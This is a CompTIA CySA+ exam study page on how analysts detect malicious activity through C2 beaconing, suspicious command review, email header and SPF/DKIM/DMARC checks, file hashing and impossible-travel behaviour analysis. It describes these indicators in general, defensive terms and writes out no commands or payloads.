Common techniques

1.3 Given a scenario, use appropriate tools or techniques to determine malicious activity.

📘CompTIA CySA+ (CS0-003)

When we talk about determining malicious activity, it means finding evidence of attacks, malware, or unauthorized access on your systems and network. Security analysts use different techniques to identify this activity quickly and accurately.

Let’s look at the common techniques:

1. Pattern Recognition

Pattern recognition is about identifying repeated signs or behaviors that are often linked to attacks.

Command and Control (C2)

  • Attackers often use command and control servers to control infected devices (bots) remotely.
  • Indicators to detect:
    • Regular or unusual communication from internal hosts to external IPs.
    • Repeated small packets sent at regular intervals (beaconing).
  • Tools used: network traffic analyzers, SIEM alerts, or IDS/IPS systems can spot these patterns.

Example: A workstation that normally only accesses company servers suddenly sends data to a strange IP every hour. That’s a C2 pattern.

2. Interpreting Suspicious Commands

Sometimes attackers leave traces on systems themselves. Analysts can look at commands executed by users or scripts.

  • Suspicious commands include:
    • Using PowerShell to download files from the internet.
    • Deleting logs or hiding system activity.
    • Creating new user accounts with high privileges.
  • Tools used: host-based logging, SIEM, or endpoint detection and response (EDR) tools.

Analysts interpret these commands to see if they match malicious behavior.

3. Email Analysis

Email is one of the most common attack vectors. Analysts need to analyze suspicious emails carefully.

a. Header Analysis

  • Every email has a header with technical details:
    • Sending server (IP address)
    • Sender information
    • Email routing path
  • Analysts check if the email came from a legitimate source.

b. Impersonation

  • Attackers often pretend to be someone trusted (like a boss or IT team).
  • Look for:
    • Slightly altered sender email addresses.
    • Requests that don’t match normal behavior.

c. DKIM, DMARC, SPF

These are email authentication protocols:

  1. DKIM (DomainKeys Identified Mail)
    • Uses a digital signature to verify that the email really came from the sender.
  2. DMARC (Domain-based Message Authentication, Reporting, and Conformance)
    • Ensures that emails passing SPF and DKIM are allowed, and reports suspicious ones.
  3. SPF (Sender Policy Framework)
    • Checks if the sending server is authorized to send emails for that domain.

d. Embedded Links

  • Attackers include links to phishing sites or malware downloads.
  • Analysts inspect URLs without clicking using tools that check domain reputation or sandbox execution.

In short: headers tell you who sent the email, DKIM/SPF/DMARC verify if it’s genuine, and links tell you where it goes.

4. File Analysis

File analysis helps determine if a file is malicious before it is opened.

Hashing

  • Every file has a unique fingerprint called a hash (MD5, SHA-256).
  • Analysts:
    • Compare the file hash against known malware databases.
    • Verify if a file was altered or tampered with.

Example: If a new executable appears on a server, hashing it can tell you if it matches known malware.

5. User Behavior Analysis

Analyzing how users normally behave helps spot abnormal activity.

a. Abnormal Account Activity

  • Unusual logins, access to files that are normally not accessed, or large data downloads.
  • Tools: SIEM, UEBA (User and Entity Behavior Analytics).

b. Impossible Travel

  • If a user logs in from two different countries within an impossible timeframe, it’s a red flag.
  • Tools: SIEM or identity analytics tools can detect impossible travel events automatically.

Key Takeaways for the Exam

  1. Pattern Recognition → look for repeated behaviors like C2 communications.
  2. Suspicious Commands → examine system commands for malicious intent.
  3. Email Analysis → check headers, verify DKIM/DMARC/SPF, watch for impersonation and malicious links.
  4. File Analysis → use hashing to identify and verify files.
  5. User Behavior Analysis → detect unusual activities like abnormal access or impossible travel.

Exam Tip:
Many CySA+ questions are scenario-based. If you see a question like:

“A user account logs in from two different countries within 30 minutes. What technique would detect this?”

The correct answer is User Behavior Analysis – Impossible Travel.

Buy Me a Coffee

Powered by
Necessary cookies enable essential site features like secure log-ins and consent preference adjustments. They do not store personal data.
None
Functional cookies support features like content sharing on social media, collecting feedback, and enabling third-party tools.
None
Analytical cookies track visitor interactions, providing insights on metrics like visitor count, bounce rate, and traffic sources.
None
Advertisement cookies deliver personalized ads based on your previous visits and analyze the effectiveness of ad campaigns.
None
Powered by